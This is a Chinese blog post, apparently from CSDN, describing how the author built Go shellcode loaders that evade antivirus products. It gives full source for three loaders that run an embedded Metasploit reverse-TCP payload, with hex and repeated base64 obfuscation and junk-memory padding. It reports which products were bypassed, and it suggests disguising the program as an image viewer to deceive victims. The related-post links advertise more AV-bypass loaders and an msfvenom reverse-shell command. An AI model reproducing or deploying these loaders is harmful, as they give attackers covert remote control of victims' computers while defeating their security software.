Go测试远控免杀学习

原创 已于 2024-07-07 16:31:05 修改 · 2.2k 阅读 · 14 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#golang #安全 #免杀

于 2022-05-07 20:30:13 首次发布
本文介绍了使用Go语言编写恶意代码以绕过杀毒软件的实验过程,包括如何生成shellcode,利用kernel32.dll和ntdll.dll动态链接库,以及通过内存混淆和编码变换来逃避检测。实验结果显示,一些常见杀毒软件如Windows Defender、金山毒霸和360安全卫士能被轻易绕过,但火绒安全能够检测到并阻止。文章探讨了Go语言在免杀方面的潜力,并提出进一步的免杀策略。

学了快一个月的 Go菜鸡也拿来瞎整一下,哈哈哈哈

虚拟机上下了一堆杀毒软件,免杀看了不少也来实验一下

实验环境:
go version go1.18
msf 6.0.45-dev
win10

下面开整

先msf 生成一段 shellcode,具体什么意思百度了解一下
复制出来转换一下格式,\x 换成 0x,逗号隔开
在这里插入图片描述
在这里插入图片描述

package main

import (
	"os"
	"syscall"
	"unsafe"
)

const (
	MEM_COMMIT             = 0x1000
	MEM_RESERVE            = 0x2000
	PAGE_EXECUTE_READWRITE = 0x40
)

var (
	kernel32      = syscall.MustLoadDLL("kernel32.dll")   //调用kernel32.dll
	ntdll         = syscall.MustLoadDLL("ntdll.dll")      //调用ntdll.dll
	VirtualAlloc  = kernel32.MustFindProc("VirtualAlloc") //使用kernel32.dll调用ViretualAlloc函数
	RtlCopyMemory = ntdll.MustFindProc("RtlCopyMemory")   //使用ntdll调用RtCopyMemory函数
	shellcode_buf = []byte{
		0xfc, 0x48, 0x83, 0xe4, 0xf0, 0xe8, 0xcc, 0x00, 0x00, 0x00, 0x41, 0x51, 0x41, 0x50, 0x52,
		0x48, 0x31, 0xd2, 0x65, 0x48, 0x8b, 0x52, 0x60, 0x51, 0x56, 0x48, 0x8b, 0x52, 0x18, 0x48,
		0x8b, 0x52, 0x20, 0x48, 0x0f, 0xb7, 0x4a, 0x4a, 0x48, 0x8b, 0x72, 0x50, 0x4d, 0x31, 0xc9,
		0x48, 0x31, 0xc0, 0xac, 0x3c, 0x61, 0x7c, 0x02, 0x2c, 0x20, 0x41, 0xc1, 0xc9, 0x0d, 0x41,
		0x01, 0xc1, 0xe2, 0xed, 0x52, 0x48, 0x8b, 0x52, 0x20, 0x8b, 0x42, 0x3c, 0x48, 0x01, 0xd0,
		0x41, 0x51, 0x66, 0x81, 0x78, 0x18, 0x0b, 0x02, 0x0f, 0x85, 0x72, 0x00, 0x00, 0x00, 0x8b,
		0x80, 0x88, 0x00, 0x00, 0x00, 0x48, 0x85, 0xc0, 0x74, 0x67, 0x48, 0x01, 0xd0, 0x8b, 0x48,
		0x18, 0x50, 0x44, 0x8b, 0x40, 0x20, 0x49, 0x01, 0xd0, 0xe3, 0x56, 0x48, 0xff, 0xc9, 0x4d,
		0x31, 0xc9, 0x41, 0x8b, 0x34, 0x88, 0x48, 0x01, 0xd6, 0x48, 0x31, 0xc0, 0xac, 0x41, 0xc1,
		0xc9, 0x0d, 0x41, 0x01, 0xc1, 0x38, 0xe0, 0x75, 0xf1, 0x4c, 0x03, 0x4c, 0x24, 0x08, 0x45,
		0x39, 0xd1, 0x75, 0xd8, 0x58, 0x44, 0x8b, 0x40, 0x24, 0x49, 0x01, 0xd0, 0x66, 0x41, 0x8b,
		0x0c, 0x48, 0x44, 0x8b, 0x40, 0x1c, 0x49, 0x01, 0xd0, 0x41, 0x8b, 0x04, 0x88, 0x41, 0x58,
		0x48, 0x01, 0xd0, 0x41, 0x58, 0x5e, 0x59, 0x5a, 0x41, 0x58, 0x41, 0x59, 0x41, 0x5a, 0x48,
		0x83, 0xec, 0x20, 0x41, 0x52, 0xff, 0xe0, 0x58, 0x41, 0x59, 0x5a, 0x48, 0x8b, 0x12, 0xe9,
		0x4b, 0xff, 0xff, 0xff, 0x5d, 0x49, 0xbe, 0x77, 0x73, 0x32, 0x5f, 0x33, 0x32, 0x00, 0x00,
		0x41, 0x56, 0x49, 0x89, 0xe6, 0x48, 0x81, 0xec, 0xa0, 0x01, 0x00, 0x00, 0x49, 0x89, 0xe5,
		0x49, 0xbc, 0x02, 0x00, 0x0d, 0x05, 0xc0, 0xa8, 0x6e, 0x7f, 0x41, 0x54, 0x49, 0x89, 0xe4,
		0x4c, 0x89, 0xf1, 0x41, 0xba, 0x4c, 0x77, 0x26, 0x07, 0xff, 0xd5, 0x4c, 0x89, 0xea, 0x68,
		0x01, 0x01, 0x00, 0x00, 0x59, 0x41, 0xba, 0x29, 0x80, 0x6b, 0x00, 0xff, 0xd5, 0x6a, 0x0a,
		0x41, 0x5e, 0x50, 0x50, 0x4d, 0x31, 0xc9, 0x4d, 0x31, 0xc0, 0x48, 0xff, 0xc0, 0x48, 0x89,
		0xc2, 0x48, 0xff, 0xc0, 0x48, 0x89, 0xc1, 0x41, 0xba, 0xea, 0x0f, 0xdf, 0xe0, 0xff, 0xd5,
		0x48, 0x89, 0xc7, 0x6a, 0x10, 0x41, 0x58, 0x4c, 0x89, 0xe2, 0x48, 0x89, 0xf9, 0x41, 0xba,
		0x99, 0xa5, 0x74, 0x61, 0xff, 0xd5, 0x85, 0xc0, 0x74, 0x0a, 0x49, 0xff, 0xce, 0x75, 0xe5,
		0xe8, 0x93, 0x00, 0x00, 0x00, 0x48, 0x83, 0xec, 0x10, 0x48, 0x89, 0xe2, 0x4d, 0x31, 0xc9,
		0x6a, 0x04, 0x41, 0x58, 0x48, 0x89, 0xf9, 0x41, 0xba, 0x02, 0xd9, 0xc8, 0x5f, 0xff, 0xd5,
		0x83, 0xf8, 0x00, 0x7e, 0x55, 0x48, 0x83, 0xc4, 0x20, 0x5e, 0x89, 0xf6, 0x6a, 0x40, 0x41,
		0x59, 0x68, 0x00, 0x10, 0x00, 0x00, 0x41, 0x58, 0x48, 0x89, 0xf2, 0x48, 0x31, 0xc9, 0x41,
		0xba, 0x58, 0xa4, 0x53, 0xe5, 0xff, 0xd5, 0x48, 0x89, 0xc3, 0x49, 0x89, 0xc7, 0x4d, 0x31,
		0xc9, 0x49, 0x89, 0xf0, 0x48, 0x89, 0xda, 0x48, 0x89, 0xf9, 0x41, 0xba, 0x02, 0xd9, 0xc8,
		0x5f, 0xff, 0xd5, 0x83, 0xf8, 0x00, 0x7d, 0x28, 0x58, 0x41, 0x57, 0x59, 0x68, 0x00, 0x40,
		0x00, 0x00, 0x41, 0x58, 0x6a, 0x00, 0x5a, 0x41, 0xba, 0x0b, 0x2f, 0x0f, 0x30, 0xff, 0xd5,
		0x57, 0x59, 0x41, 0xba, 0x75, 0x6e, 0x4d, 0x61, 0xff, 0xd5, 0x49, 0xff, 0xce, 0xe9, 0x3c,
		0xff, 0xff, 0xff, 0x48, 0x01, 0xc3, 0x48, 0x29, 0xc6, 0x48, 0x85, 0xf6, 0x75, 0xb4, 0x41,
		0xff, 0xe7, 0x58, 0x6a, 0x00, 0x59, 0x49, 0xc7, 0xc2, 0xf0, 0xb5, 0xa2, 0x56, 0xff, 0xd5,
	}
)

func checkErr(err error) {
	if err != nil { //如果内存调用出现错误,可以报出
		if err.Error() != "The operation completed successfully." { //如果调用dll系统发出警告,但是程序运行成功,则不进行警报
			println(err.Error())
			os.Exit(1)
		}
	}
}

func main() {
	shellcode := shellcode_buf

	//调用VirtualAlloc为shellcode申请一块内存
	addr, _, err := VirtualAlloc.Call(0, uintptr(len(shellcode)), MEM_COMMIT|MEM_RESERVE, PAGE_EXECUTE_READWRITE)
	if addr == 0 {
		checkErr(err)
	}

	//调用RtlCopyMemory来将shellcode加载进内存当中
	_, _, err = RtlCopyMemory.Call(addr, (uintptr)(unsafe.Pointer(&shellcode[0])), uintptr(len(shellcode)))
	checkErr(err)

	//syscall来运行shellcode
	syscall.Syscall(addr, 0, 0, 0, 0)
}

kernel32.dll 是一个很常见的DLL,它包含核心系统功能,如访问和操作内存、文件和硬件,几乎很多木马都会去调用这个函数

ntdll.dll    是Windows内核的接口。可执行文件通常不直接导入这个函数,而是由Kernel32.dll间接导入,
			 如果一个可执行文件导入了这个文件,这意味着作者企图使用Ntdll.dll 那些不是正常提供给Windows程序使用的函数。
			 一些如隐藏功能和操作进程等任务会使用这个接口

编译 go程序,go build demo.go

还可以做点手脚,比如去掉运行时的黑框 go build -ldflags="-H windowsgui -w -s" demo.go
甚至骚一点,可以让程序调用打开图片,让人以为这是一个打开图片的程序,放松警惕

好了,现在传到虚拟机上测试效果

1、windows defender

在这里插入图片描述
静态查杀没问题,现在试试运行,可以直接过,啊这
在这里插入图片描述

2、金山毒霸

在这里插入图片描述
静态也是没问题,现在运行,同样很轻松
在这里插入图片描述

3、360安全卫士

虽然被查出来了,但是上传上去并没有立刻报毒,所以如果受害者没有经常扫毒的习惯还是有机会的
比如我电脑就是养毒一堆马懒得管
在这里插入图片描述
在这里插入图片描述

4、火绒安全

刚传上去就报毒,然后给我自动删了,没得玩了
在这里插入图片描述

修改一下,把shellcode 单独拿出来再试一下

这里把0x 逗号 还有换行空格全部去掉,在加载时再恢复
在这里插入图片描述

package main

import (
	"encoding/hex"
	"fmt"
	"io/ioutil"
	"os"
	"syscall"
	"unsafe"
)

const (
	MEM_COMMIT             = 0x1000
	MEM_RESERVE            = 0x2000
	PAGE_EXECUTE_READWRITE = 0x40
)

var (
	kernel32      = syscall.MustLoadDLL("kernel32.dll")
	ntdll         = syscall.MustLoadDLL("ntdll.dll")
	VirtualAlloc  = kernel32.MustFindProc("VirtualAlloc")
	RtlCopyMemory = ntdll.MustFindProc("RtlCopyMemory")
)

func Readcode() string {
	f, err := ioutil.ReadFile("1.txt") 
	//为我们需要加载的shellcode文件,这里可以使用其他格式的文件来进行混淆
	if err != nil {
		fmt.Println("read fail", err)
	}
	return string(f)
}

func checkErr(err error) {
	if err != nil {
		if err.Error() != "The operation completed successfully." {
			println(err.Error())
			os.Exit(1)
		}
	}
}

func main() {
	b := Readcode() // 加载shellcode

	shellcode, err := hex.DecodeString(b) 
	if err != nil {
		checkErr(err)
	}

	addr, _, err := VirtualAlloc.Call(0, uintptr(len(shellcode)), MEM_COMMIT|MEM_RESERVE, PAGE_EXECUTE_READWRITE)
	if addr == 0 {
		checkErr(err)
	}

	_, _, err = RtlCopyMemory.Call(addr, (uintptr)(unsafe.Pointer(&shellcode[0])), (uintptr)(len(shellcode)))
	checkErr(err)

	syscall.Syscall(addr, 0, 0, 0, 0)

}

好吧,还是给火绒查出来了,试试360能不能查出来
在这里插入图片描述
还好,这次360没查出来,直接过了
在这里插入图片描述

5、微步沙箱

在这里插入图片描述

6、VirusTotal

在这里插入图片描述

现在就是火绒免杀还没效果

在前面基础上改进,考虑可以把 shellcode多编码几次

在shellcode 载入内存前可以先载入一段没用的字符串到内存达到混淆的效果

shellcode 也可以分段载入到内存中

package main

import (
	"encoding/base64"
	"encoding/hex"
	"fmt"
	"io/ioutil"
	"os"
	"syscall"
	"unsafe"
)

const (
	MEM_COMMIT             = 0x1000
	MEM_RESERVE            = 0x2000
	PAGE_EXECUTE_READWRITE = 0x40
)

var (
	kernel32      = syscall.MustLoadDLL("kernel32.dll")
	ntdll         = syscall.MustLoadDLL("ntdll.dll")
	VirtualAlloc  = kernel32.MustFindProc("VirtualAlloc")
	RtlCopyMemory = ntdll.MustFindProc("RtlCopyMemory")
)

func checkErr(err error) {
	if err != nil {
		if err.Error() != "The operation completed successfully." {
			println(err.Error())
			os.Exit(1)
		}
	}
}

func Readcode() string {
	f, err := ioutil.ReadFile("1.txt")
	if err != nil {
		fmt.Println("read fail", err)
	}
	return string(f)
}

func Base64DecodeString(str string) string {
	resBytes, _ := base64.StdEncoding.DecodeString(str)
	return string(resBytes)
}

func main() {

	//内存加载shellcode前,先压入一段无关字符串用来混淆
	var c string = "qweqwdsfqweqwqwswqqweqdqwdqwdwqeqrwqeqwQWRQW/.OPKDIJGIJWDOIAOSJIRGJOEKDOQIWOIJOGWEMPOSDPOOPGKWE[LWEPQKPOKEORKOPKPROKPOKOPQWKEPQOGOIMEKOMDMQWPODPOKOK3-021-04-34-3204O-02I059032JR0JI@JI3J3E02e"

	//调用VirtualAllo申请一块内存
	addr1, _, err := VirtualAlloc.Call(0, uintptr(len(c)), MEM_COMMIT|MEM_RESERVE, PAGE_EXECUTE_READWRITE)
	//调用RtlCopyMemory加载进内存当中
	_, _, err = RtlCopyMemory.Call(addr1, (uintptr)(unsafe.Pointer(&c)), uintptr(len(c)/2))

	b := Readcode()                     // 加载 shellcode
	deStrBytes := Base64DecodeString(b) // 6 次base64解码
	for i := 0; i < 5; i++ {
		deStrBytes = Base64DecodeString(deStrBytes)
	}
	shellcode, err := hex.DecodeString(deStrBytes)

	addr, _, err := VirtualAlloc.Call(0, uintptr(len(shellcode)), MEM_COMMIT|MEM_RESERVE, PAGE_EXECUTE_READWRITE)
	if addr == 0 {
		checkErr(err)
	}
	_, _, err = RtlCopyMemory.Call(addr, (uintptr)(unsafe.Pointer(&shellcode[0])), uintptr(len(shellcode)/2))
	_, _, err = RtlCopyMemory.Call(addr+uintptr(len(shellcode)/2), (uintptr)(unsafe.Pointer(&shellcode[len(shellcode)/2])), uintptr(len(shellcode)/2))
	checkErr(err)

	syscall.Syscall(addr, 0, 0, 0, 0)

}

在这里插入图片描述
在这里插入图片描述

总结

Go的免杀效果确实很不错,这些常见的杀毒软件都是可以很轻松的就绕过了

还有就是,电脑装一堆杀毒软件互相打架真的害怕,电脑风扇不知道干啥呼呼没停过,

卡的一逼,开个文件还要等他转一会儿,我麻了啊

问个问题,女生的电脑是不是也是这样子的呢,至少2个杀毒软件

我啥也没干,90% 真不错
在这里插入图片描述

【护网必备】Windows平台shellcode加载器
Fly_鹏程万里
06-14 1061
bypass:McAfee、金山(数字签名)、火绒、ESET、卡巴企业版(时间5s 抖动50 Sleep_mask)、360全家桶(物理机)、Norton(加白程序资源)、WDF(PC)、WDF(Server)、Symantec(加白程序资源)bypass:金山(数字签名)、火绒、ESET、360全家桶(物理机)、WDF(PC)、WDF(服务器提示复查(关云保护))、McAfee、Norton(加白程序资源)、卡巴企业版(时间5s 抖动50 Sleep_mask)必须使用Bof操作,shell运行就掉线。
go-shellcode:将Shellcode加载到新进程中
02-06
壳码 这是一个将shellcode作为自己的进程运行的程序,所有程序均来自内存。 这样做是为了击败反病毒检测。 用法 请记住,只有64位shellcode将在64位进程中运行。 这无法自动检测您的Shellcode架构。 使用msfvenom或metasploit以十六进制格式生成一些shellcode: $ msfvenom -p windows/meterpreter/reverse_tcp -f hex -o rev.hex LHOST=127.0.0.1 LPORT=4444 c:\windows\temp>sc.exe fce8820000006089e531c0648b5030
基于Go加载shellcode
Le1a's Blog
10-21 2836
这里通过TideSec的go项目来从0开始学习首先导个包,需要用到如下几个包。io/ioutil 文件操作os 系统操作syscall syscall包含一个指向底层操作系统原语的接口unsafe Go指针的操作非常有限,仅支持赋值和取值,不支持指针运算,可以通过unsafe包来达到效果这里定义一下变量,然后需要通过syscall来加载两个dll,和ntdll.dll。然后这里有一个检查报错的函数,如果有报错就退出并打印报错信息。
从 0 到 1 学:网络安全爱好者的入门级技术解析,一文详解!
最新发布
wangluo12138的博客
11-06 737
技术全称为反毒技术Anti Anti- Virus简称“”,它指的是一种能使病毒木马于被毒软件查的技术。由于技术的涉猎面非常广,其中包含反汇编、逆向工程、系统漏洞等黑客技术,所以难度很高,一般人不会或没能力接触这技术的深层内容。其内容基本上都是修改病毒、木马的内容改变特征码,从而躲避了毒软件的查
方法(五)golang加载器cobaltstrike shellcode
qq_56426046的博客
10-04 2207
Go语言目前是最火的编程语言之一,使用go语言编写的加载器,运行shellcode 可以过国内主流软,例如360安全卫士、360安全毒、火绒、瑞星、金山、 电脑管家。效果很好。而且操作的步骤简单。 项目地址https:/github.com/jax777/shellcode-launch Go语言编译器下载https:/studygolang.com/dlDownloads - The Go Programming Language安装go,下载安装包,傻瓜安装即可。解压下载的项目压缩包,新建6
记一次Go语言的学习--shellcode加载器
jjjjj34的博客
04-24 3256
在网上搜了很多关于Go语言的,我也是刚学几天,就做个学习对于GO语言做的记录。
方法(十)GOshellcode加载器 — go-shellcode-loader​
qq_56426046的博客
10-04 2730
GO混淆shellcode加载器AES加密,混淆反检测 过DF、360和火绒。
从入门到实践之白名单(113个)总结篇1
08-03
【标题】中的"从入门到实践之白名单(113个)总结篇1"指的是一项关于制软件技术的研究,其中重点是利用系统的白名单机制来绕过安全检测。白名单是一种安全策略,只允许预定义的、被认为是安全的...
从入门到实践(5)-代码篇-Python
weixin_46236101的博客
03-13 1374
郑重声明:文中所涉及的技术、思路和工具仅供以安全为目的的学习交流使用,任何人不得将其用于非法用途以及盈利等目的,否则后果自行承担! 《从入门到实践》系列文章目录: 1、从入门到实践 (1)基础篇 2、从入门到实践 (2)工具总结篇 3、从入门到实践 (3)代码篇-C/C++ 4、从入门到实践 (4)代码篇-C# 5、从入门到实践 (5)代码篇-Python 6、从入门到实践 (6)代码篇-Powershell 7、从入门到实.
TideSec学习二(Evasion模块+veil)
fa1lr4in的小博客
02-10 1384
Evasion模块 参考链接: applocker_evasion_install_util.md: https://github.com/rapid7/metasploit-framework/blob/master/documentation/modules/evasion/windows/applocker_evasion_install_util.md 基于白名单Csc.exe执行...
TideSec学习五(avoidz+Green-Hat-Suite+zirikatu+DKMC)
fa1lr4in的小博客
02-13 825
参考资料 官方使用教程:https://www.youtube.com/watch?v=ZilOByKkrVk avoidz 介绍 Avoidz是一个比较使用比较简单的小工具,利用msf生成powershell的shellocde,然后利用c#、python、go、ruby等语言对shellcode进行编译生成exe而达到的效果,套路比较简单,但效果还算不错。 安装 git ...
一文带你学会0编程基础做木马
hackzkaq的博客
08-17 908
更多渗透技能 ,10余本电子书及渗透工具包,搜公众号:白帽子左一 作者:掌安全-骚骑 背景 之前分享了个入门文,很浅显,比较适合小白看… 文章在社区,地址我放在这了,有兴趣可以一戳: https://bbs.zkaq.cn/t/4456.html (ps:社区邀请码可以文末扫码找助教领取,社区投稿还有钱赚) 这次实实在在写一个,能过微软自带def,火绒,卡巴这些! 一、0x01环境 靶机: IP:192.168.111.10 软:火绒,360,卡巴,微软def 本机: IP:192.168.
绕过AV:shellcode加载器
03-04
旁路AV 条件触发式VT 6/70国内软及后卫,卡巴斯基等主流软 原理 使用 将shellcode填至go_shellcode_encode.py生成重复后的base64有效负载然后将生成的payload填至main.go build(“ b64shellcode”)将main.go中的网址替换为您vbs的某个网页或文本(称为网页同样可以,但是需要程序可以正常使用时此网页需要可以访问)编译:go build -ldflags =“-w -s -H = windowsgui”
Golang的Cobalt Strike Shellcode Loader-Golang开发
05-26
Cobalt Strike Shellcode Loader by Golang Doge-Loader Cobalt Strike Shellcode Loader by Golang 本人github的项目可能目前主要分为两大类, :frog: Frog系列为自动化扫描方向, :dog_face: Doge系列为及内网渗透方向 Doge-Loader为Doge系列中较为重要的项目 :dog_face: 本项目感谢朋友gd, skate_zhu的帮助 :dog_face: Doge-Loader 本项目主要作用为Cobalt Strike的shellcode加载器 项目结构如下: main.go 主程序,用于程下载shellcode并加载(需要自行上传shellcode(bin文件)并且修改源码里的url等参数) xor.go 异或编码解码器 /enhancement 附加功能,主要用于等(需自行在main.go中调用) /enhancement/copy.go 程序自删除与自复制 /enhancement/sandbox.go
01-13
最新,过360.瑞星,等等。
工具】Windows通用shellcode加载器
Fly_鹏程万里
06-11 1950
本工具由ShellQMaker.exe和加载模板文件(loading.exe)组成。ShellQMaker.exe将不同的shellcode写入加载的模板文件(loading.exe)中,生成不同的可执行文件。运行环境:加载器模板通过QT实现使用C++开发,并由VS2022静态编译,目前只有一种加载模式,其他加载模式正在开发中。使用方法:使用vs2022打开项目解决方案(.sln),然后进行编译即可,当然你也可以从。ShellQMaker (你的shellcode) (生成的可执行文件)
shellcode
土豆的博客
07-14 2320
0x06利用wmic程文件不落地执行shellcode 1、msf生成的hta链接放入hta.xsl文件中,(其中JScript调用mshta运行恶意hta),并将文件放置攻击方服务器 <?xml version='1.0'?> <stylesheet xmlns="http://www.w3.org/1999/XSL/Transform" xmlns:ms="urn:schemas-microsoft-com:xslt" xmlns:user="placeholder" ..
对抗】程加载AES+XOR异或加密的ShellCode加载器 过国内
qq_35942869的博客
03-28 2572
纯萌新,尝试一下,最近也是查了很多资料,面向Github编程借鉴了很多大佬的代码。通过XOR异或加密后再进行AES加密,然后通过修改shellcode加载方式进行简单的
(绕过最新360、火绒)shellcode分离加载实现CS上线
tzyyyyyy的博客
07-23 604
基于XOR加密的Shellcode加载器项目,通过内存解密执行实现基础,包含C++加载器和Python加密脚本,可绕过常规静态检测。
深入学习Go语言:Golang练习、文章与测试
标题中提到的 "golang:Estudos,artigos e testes usando GolangGo)" 指明了这份文件涉及的内容是关于Golang学习、文章阅读以及使用Go进行的测试Golang,通常称为Go,是Google开发的一种开源编程语言,旨在...
评论 10
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

paidx0

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值